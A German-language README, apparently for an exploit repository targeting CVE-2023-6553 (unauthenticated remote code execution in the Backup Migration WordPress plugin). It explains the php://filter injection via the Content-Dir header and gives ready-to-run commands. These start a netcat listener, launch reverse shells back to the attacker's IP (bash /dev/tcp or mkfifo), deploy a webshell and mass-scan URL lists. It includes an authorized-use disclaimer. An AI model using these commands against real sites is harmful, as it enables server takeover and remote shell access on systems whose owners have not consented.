
Dieser Exploit basiert auf CVE-2023-6553 und wurde auf dem ursprünglichen Exploit von Chocapik aufgebaut, es wurde hinzugefügt, dass eine direkte Reverse-Shell erhalten werden kann.
Eine erweiterte Version von Chocapikk's CVE-2023-6553 Exploit, die einen Reverse-Shell-Modus mit einem Befehl zusätzlich zur ursprünglichen interaktiven Webshell hinzufügt.
CVE-2023-6553 — Nicht authentifizierte Remote-Code-Ausführung im Backup Migration WordPress-Plugin (Versionen ≤ 1.3.7).
Das Plugin stellt backup-heart.php bereit, das eine PHP-Filter-Kette aus dem HTTP-Header Content-Dir liest und ohne Authentifizierung oder Bereinigung an include() übergibt. Dadurch kann ein nicht authentifizierter Angreifer beliebigen PHP-Code ausführen, indem er eine manipulierte php://filter-Kette injiziert.
Ursprünglicher Exploit von Chocapikk — die gesamte Kern-Exploit-Logik (Filterketten-Generierung, Dateischreiben, interaktive Shell) stammt von ihm. Dieses Repository erweitert sie lediglich um einen Reverse-Shell-Trigger-Modus.
Die einzigen Ergänzungen sind:
trigger_reverse_shell()-Methode — sendet nach dem Bereitstellen der Webshell (gleicher Prozess wie im Original) eine einzelne GET-Anfrage mit dem Reverse-Shell-Befehl als 0-Parameter, genau wie die interaktive Shell es tun würde.main() — tauscht interactive_shell() gegen trigger_reverse_shell() aus, wenn -r vorhanden ist.Alles andere — Schwachstellenprüfung, Dateischreibschleife, Kopieren/Löschen, interaktiver Modus, Multi-URL-Scanning — bleibt unverändert vom Original.
pip install requests rich alive-progress prompt-toolkit php-filter-chain
# Start your listener first
rlwrap nc -lvnp 4444
# Run the exploit
python3 exploit.py -u http://TARGET/blog -r -l YOUR_IP -p 4444
Falls bash /dev/tcp auf dem Ziel nicht verfügbar ist, verwenden Sie mkfifo (nutzt stattdessen nc):
python3 exploit.py -u http://TARGET/blog -r -l YOUR_IP -p 4444 --shell mkfifo
python3 exploit.py -u http://TARGET/blog
python3 exploit.py -u http://TARGET/blog -c
python3 exploit.py -f urls.txt -t 10 -o vulnerable.txt
-u / --url Target base URL (e.g. http://target/blog)
-r / --revshell Enable reverse shell mode
-l / --lhost Your IP to receive the shell (required with -r)
-p / --lport Your listener port (default: 4444)
--shell Shell type: bash (default) or mkfifo
-c / --check Check vulnerability only, do not deploy shell
-f / --file File with list of URLs to scan
-t / --threads Threads for multi-URL scan (default: 5)
-o / --output Output file for scan results
1. POST /wp-content/plugins/backup-backup/includes/backup-heart.php
Content-Dir: php://filter/...<encoded PHP>
→ Writes webshell char by char to a temp file
→ Copies temp file to <random>.php
2. GET /wp-content/plugins/backup-backup/includes/<random>.php?0=<cmd>
→ Executes command via backtick operator
→ Interactive mode: loops reading commands from stdin
→ Reverse shell mode: sends bash/mkfifo one-liner, connects to listener
3. Cleanup: unlink(<random>.php)
Dieses Tool ist ausschließlich für autorisierte Penetrationstests und Sicherheitsforschung bestimmt. Verwenden Sie es nicht gegen Systeme, für die Sie keine ausdrückliche Erlaubnis zum Testen haben.
| Funktion | Original (Chocapikk) | Diese Version |
|---|
| Interaktive Webshell | ✅ | ✅ (unverändert) |
| Reverse Shell | ❌ | ✅ (-r) |
| Multi-URL-Scanning | ✅ | ✅ (unverändert) |
| Neue Argumente | — | -r, -l, -p, --shell |